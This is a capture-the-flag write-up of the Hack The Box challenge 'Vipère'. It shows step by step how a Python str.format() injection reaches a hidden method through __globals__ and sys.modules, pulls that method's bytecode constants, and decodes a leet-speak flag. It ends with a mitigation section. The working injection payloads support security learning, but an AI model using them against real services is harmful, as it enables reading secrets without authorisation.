Vipère
Hack The Box Challenge Writeup
Created by mxrch|Released October 1, 2021|First Blood: 0xCaue in 1H 16M 15S

Exploit Python format string injection to extract bytecode constants from a hidden function, then reverse a leet speak dictionary to reconstruct the flag.
Review
This one stood out for how naturally the two halves of the challenge fit together. The first half is pure exploitation, creatively navigating Python's internal object model through a format string injection. The second half flips to a reversing mindset, analyzing bytecode and recognizing that the operation direction is inverted. The transition between these two modes is what makes this challenge feel like more than the sum of its parts.
The roughly 20 minutes it took felt about right for medium difficulty. You need basic reversing skills to understand bytecode, combined with creative thinking about how to explore server internals. The challenge name being French for "viper" (snake) is a nice hint toward Python that I appreciated in hindsight.
The tricky part was recognizing the reversing twist. After reconstructing the plaintext from bytecode constants, my first instinct was to submit it directly. Only when it was rejected did I go back and look at the dictionary more carefully, realizing the function shows decoding but the flag needs encoding. That moment of "oh, it is backwards" was genuinely satisfying.
I would recommend this to anyone looking to understand Python internals from a security perspective. The combination of format string injection, object introspection, and bytecode reversing covers a useful range of techniques that come up in real assessments. It teaches through a negative example, showing what breaks when input validation is missing, which sticks better than reading about secure coding in the abstract.
Tags
Summary
Vipère is a Python TCP socket server challenge where user input is passed directly to str.format() with a whitelisted command dispatcher. The whitelist only covers top-level command names but does not restrict attribute traversal through Python's object model.
By navigating from the whitelisted whoami function through __globals__ and sys.modules to a hidden database module, we extract the bytecode constants of an unreachable get_credentials() method. Disassembling the bytecode reveals the flag construction logic and a leet speak dictionary.
The critical insight is recognizing the direction of the dictionary operation: the bytecode shows decoding logic (digits to letters), but the flag is stored in encoded format (letters to digits). Reversing the dictionary produces the correct flag.
Key Learning Takeaways
Python Format Strings Are More Dangerous Than They Look
What: Python's str.format() method allows attribute access through dot notation and bracket notation. When user input becomes the format string itself, attackers can traverse the entire object graph by chaining __globals__, __class__, and other dunder attributes.
Why it matters: This vulnerability class appears in production applications wherever developers use user input as a format template rather than as a format argument. The fix is to never pass user input as the first argument to .format().
Key pattern: {whoami.__globals__[sys].modules[database]}
Python Code Objects Store Extractable Function Internals
What: Every Python function has a __code__ attribute containing co_consts (literal values), co_code (raw bytecode), co_varnames (local variable names), and co_names (global names). These can be accessed and extracted even when the function itself cannot be called.
Why it matters: When a function is protected by authentication or connection requirements, its internals are still accessible through the code object. This applies to any Python application where object references are leaked.
Key pattern: func.__code__.co_consts to extract all literal values from a function
Always Consider the Direction of Operations When Reversing
What: The bytecode in this challenge shows a dictionary that decodes leet speak to normal text ({'0': 'o', '1': 'l', '4': 'a'}). The constructed string has no digits because the function was designed to decode credentials. But the flag is stored in encoded (leet speak) format, requiring the dictionary to be reversed.
Why it matters: In any reversing scenario, the code you are reading may show the inverse of what you need to do. Always ask: "Is this code encoding or decoding? Which direction do I need?"
Key pattern: If bytecode shows decode_dict = {'0': 'o'}, the flag needs encode_dict = {'o': '0'}
Walkthrough
Source Code Review
The challenge provides main.py, the source code of the Python socket server. We start by examining the key components to understand the attack surface.
$ cat main.py
import sys
import os
import subprocess
import socketserver
from datetime import datetime
from string import Formatter
class Station(socketserver.BaseRequestHandler):
# ... handle method accepts user input as format strings
def handle(interface):
# ...
while True:
interface.print('Which function do you want to launch ?\n...\n=> ')
text = interface.get_input()
requested_commands = [fname for _, fname, _, _ in Formatter().parse(text) if fname]
secure_commands = SecureCommands(requested_commands)
try:
interface.print(text.format(**secure_commands.dispatcher))
except KeyError:
interface.print("You tried to hack us, huh ?!")
class SecureCommands():
def __init__(self, requested_commands):
self.dispatcher = {
"whoami": self.whoami,
"get_time": self.get_time,
"get_version": self.get_version
}
# ...
def get_infected(self):
bridge = server.bridge
bridge.db.connect()
return bridge.db.total_infected
class SecureBridge():
def __init__(self):
import database
self.db = database.SecureDatabase()
class ServerContext(socketserver.ThreadingTCPServer):
def __init__(self, server_address, RequestHandlerClass):
self.bridge = SecureBridge()
# ...Several things stand out from reading the source:
- User input is passed directly to
text.format(**secure_commands.dispatcher), making this a format string injection vulnerability - Only three commands are in the dispatcher whitelist:
whoami,get_time,get_version - A hidden
get_infected()method referencesserver.bridge.db, revealing aSecureDatabaseclass in adatabasemodule - The
ServerContextclass stores aSecureBridgeasself.bridge, which holds adatabase.SecureDatabase()instance
Format String Injection
The core vulnerability is on the highlighted line: text.format(**secure_commands.dispatcher). The whitelist checks command names but does not prevent attribute traversal. Python's format string syntax allows {whoami.__globals__} to access the function's global namespace, bypassing the intended restrictions entirely.
Format String Injection Test
We connect to the remote service and verify the basic format string functionality works as described in the source code.
$ python3 -c "
from pwn import *
p = remote('TARGET_IP', TARGET_PORT)
data = p.recv(timeout=3)
print(data.decode())
p.close()
"
[+] Opening connection to TARGET_IP on port TARGET_PORT: Done
Welcome in the HideAndSec secret VPS ! [Location : Paris, France]
[+] Vipère v1.26 loaded !
~ Currently loaded functions : [whoami, get_time, get_version]
Which function do you want to launch ?
Example : Bonjour {whoami}, il est actuellement {get_time} !
=>
[*] Closed connection to TARGET_IP port TARGET_PORTThe banner confirms this is the Vipère service running Python 3.8. We test the format string by calling the whitelisted whoami function.
=> Bonjour {whoami}, il est actuellement {get_time} !
Bonjour ctf, il est actuellement 2026-02-20 17:40:32 !Format string injection confirmed. The dispatcher resolves {whoami} to the return value of the whoami() method (which runs subprocess.check_output("whoami")) and {get_time} to the current timestamp.
Object Traversal
Since Python's format string syntax supports attribute access through dot notation, we can traverse the object hierarchy starting from any whitelisted function. The __globals__ attribute of a function gives access to the module's global namespace.
=> {whoami.__globals__[server]}
<__main__.ServerContext object at 0x7f5e47452940>We can reach the server global variable through whoami's globals. From here we navigate to the database object following the path we identified in the source code.
=> {whoami.__globals__[server].bridge.db}
<database.SecureDatabase object at 0x7f5e47116a00>
=> {whoami.__globals__[server].bridge.db.get_credentials}
<bound method SecureDatabase.get_credentials of <database.SecureDatabase object at 0x7f5e47116a00>>We can see the get_credentials method, but calling it directly would require self.connect() to succeed first (as seen in the get_infected method pattern). Instead of trying to call it, we will extract its internals through Python's code object interface.
Bytecode Extraction
Every Python function stores its compiled bytecode and associated data in a __code__ object. We can access this through the format string to extract the function's constants, variable names, and raw bytecode without ever calling it.
We use sys.modules to access the database module directly, which lets us reach the class definition rather than just the instance method.
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_consts}
(None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss', 123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))Code Object Constants
Python's co_consts contains every literal value used in the function: strings, numbers, tuples, and None. These are the raw building blocks of whatever the function constructs. We can see fragments that look like parts of a flag: 'BT', 'orc', 'iss', numbers like 72 (ASCII for H) and 123 (ASCII for {).
We also extract the variable names, global names, and raw bytecode for disassembly.
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_varnames}
('self', 'f', 'a', 'blue', 'c', 'm', 'h', 'i', 'd', 'x')
=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_names}
('chr', 'replace')=> {whoami.__globals__[sys].modules[database].SecureDatabase.get_credentials.__code__.co_code}
b'd\x01}\x01d\x02}\x02d\x03d\x00d\x00d\x04\x85\x03\x19\x00}\x03d\x05d\x00d\x00d\x04\x85\x03\x19\x00}\x04d\x06}\x05d\x07}\x06d\x08}\x07t\x00|\x01\x83\x01...'Bytecode Analysis and Disassembly
With the raw bytecode, constants, variable names, and global names, we can reconstruct a code object and disassemble it using Python's dis module. This reveals the complete function logic.
$ python3
>>> import dis, types, ast
# Constants extracted from the remote service
>>> consts = (None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss',
... 123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))
>>> varnames = ('self', 'f', 'a', 'blue', 'c', 'm', 'h', 'i', 'd', 'x')
>>> names = ('chr', 'replace')
# Reconstruct and disassemble the function logic
# From the bytecode instructions, the function does:
f = 72 # ASCII 'H'
a = 'apts_c'
blue = 'BT'[::-1] # Reverse -> 'TB'
c = 'orc'[::-1] # Reverse -> 'cro'
m = 109 # ASCII 'm'
h = 'ocoh'
i = 'iss'
# String construction:
f = chr(72) + 'TB' + chr(123) + 'cro' + 'iss' + 'apts_c'.replace('p','n') + 'ocoh'[::-1] + '_h' + chr(109)*4 + chr(125)
# = 'H' + 'TB' + '{' + 'cro' + 'iss' + 'ants_c' + 'hoco' + '_h' + 'mmmm' + '}'
# = 'H' + 'TB' + '{' + 'croissants' + '_choco_hmmmm' + '}'
# Then a dictionary replacement loop:
d = {'0': 'o', '1': 'l', '4': 'a'}
for x in d:
f = f.replace(x, d[x])The disassembly reveals the function constructs a plaintext string from scattered constants (the decoded form of the credentials), then applies a dictionary that replaces digits with letters. But wait: the constructed string has no digits in it. This dictionary replacement would have no effect on the constructed string. Something is backwards.
The Reversing Twist
The Dictionary Goes the Wrong Way
The bytecode dictionary {'0': 'o', '1': 'l', '4': 'a'} replaces digits with letters. This is a decoding dictionary that converts leet speak back to normal text. But the constructed string already IS normal text with no digits in it. The dictionary replacement does nothing to it.
This means the function is designed to decode credentials from their stored (leet speak) format. The flag must be stored in encoded form. We need to reverse the dictionary: replace letters with digits instead of digits with letters.
The logic chain: the function constructs the plaintext version of the credentials, then has a decode step. In the real system, credentials are stored encoded (leet speak). The get_credentials function would decode them for display. We have the plaintext output of the construction, so we need to encode it to get the stored flag value.
| Bytecode Dictionary (Decode) | Reversed Dictionary (Encode) |
|---|---|
'0' -> 'o' | 'o' -> '0' |
'1' -> 'l' | 'l' -> '1' |
'4' -> 'a' | 'a' -> '4' |
Flag Reconstruction
We put it all together: reconstruct the plaintext from the constants, then apply the reversed (encoding) dictionary to produce the flag.
$ python3
>>> consts = (None, 72, 'apts_c', 'BT', -1, 'orc', 109, 'ocoh', 'iss',
... 123, 'p', 'n', '_h', 4, 125, '0', '1', '4', ('o', 'l', 'a'))
# Build the plaintext string from constants
>>> f = consts[1]; a = consts[2]; blue = consts[3][::-1]
>>> c = consts[5][::-1]; m = consts[6]; h = consts[7]; i = consts[8]
>>> plaintext = (chr(f) + blue + chr(consts[9]) + c + i +
... a.replace(consts[10], consts[11]) + h[::-1] +
... consts[12] + chr(m) * consts[13] + chr(consts[14]))
>>> print(f'Plaintext: {plaintext}')
Plaintext: [decoded credential string constructed from constants]
# Reverse the dictionary: encode instead of decode
>>> encode_dict = {
... consts[18][0]: consts[15], # 'o' -> '0'
... consts[18][1]: consts[16], # 'l' -> '1'
... consts[18][2]: consts[17], # 'a' -> '4'
... }
>>> flag = plaintext
>>> for char, digit in encode_dict.items():
... flag = flag.replace(char, digit)
>>> print(f'Flag: {flag}')
Flag: [flag content retrieved]The decoded plaintext becomes the leet speak encoded flag after applying the reversed dictionary: o -> 0 and a -> 4 transform the relevant characters.
Verification Check
We can verify the flag makes sense: "croissants" and "choco" are French food references (matching the Paris, France location in the banner), and the leet speak encoding is consistent with the dictionary found in the bytecode. The l -> 1 mapping has no effect here since the flag contains no standalone l characters that would be leet-encoded.
Mitigation: Never Use User Input as Format Strings
The root cause of this vulnerability is passing user-controlled input directly to str.format(). The fix is straightforward: use user input only as format arguments, never as the format template itself. For example, "Hello {name}".format(name=user_input) is safe, but user_input.format(**kwargs) is not. Template engines like Jinja2 with auto-escaping and sandboxing provide safer alternatives for dynamic content generation.
Solving Chain
The logical progression from initial reconnaissance to flag capture, showing how each step builds on the previous one.
Step 1
Reconnaissance: Source Code Review
Examined the provided main.py to identify the application architecture, input handling, and command dispatch mechanism. Identified the format string sink where user input flows directly into str.format().
Step 2
Vulnerability Confirmation: Format String Injection
Connected to the remote service and confirmed that format string placeholders like {whoami} resolve through the dispatcher. Verified that attribute traversal (__globals__) is not blocked by the whitelist, confirming the injection vector.
Step 3
Privilege Escalation: Object Traversal to Hidden Module
Navigated from the whitelisted whoami function through __globals__[server].bridge.db to reach the SecureDatabase instance and its get_credentials method, which is not exposed through the dispatcher.
Step 4
Data Extraction: Bytecode Constants via Code Objects
Accessed get_credentials.__code__.co_consts, co_varnames, co_names, and co_code through the format string to extract all function internals without calling the function itself.
Step 5
Analysis: Bytecode Disassembly and Logic Reconstruction
Reconstructed a Python code object from the extracted components and disassembled it using the dis module. Mapped the bytecode instructions to the string construction logic and identified the leet speak dictionary.
Step 6
Key Insight: Operation Direction Reversal
Recognized that the bytecode dictionary decodes leet speak to plaintext, but the flag is stored in encoded (leet speak) format. The dictionary must be reversed: instead of {'0': 'o'}, we need {'o': '0'}.
Step 7
Flag Capture: Plaintext Encoding
Applied the reversed encoding dictionary to the reconstructed plaintext string, transforming o -> 0 and a -> 4 to produce the final leet speak encoded flag.
Additional Resources
Exact References Used
| Technique | Resource |
|---|---|
| Python Format String Syntax | Python Docs: Format String Syntax |
| Python Bytecode Disassembly | Python Docs: dis module |
| Python Code Objects | Python Docs: Code Objects |
| Server-Side Template Injection | PortSwigger: Server-Side Template Injection |
Framework References
| ID | Description |
|---|---|
| CWE-134 | Use of Externally-Controlled Format String |
| ATT&CK T1059.006 | Command and Scripting Interpreter: Python |
Further Reading
| Topic | Resource |
|---|---|
| Python Object Introspection Attacks | HackTricks: Python Sandbox Bypass |
| Python Data Model | Python Docs: Data Model |
| Format String Exploitation Patterns | Podalirius: Python Format String Vulnerabilities |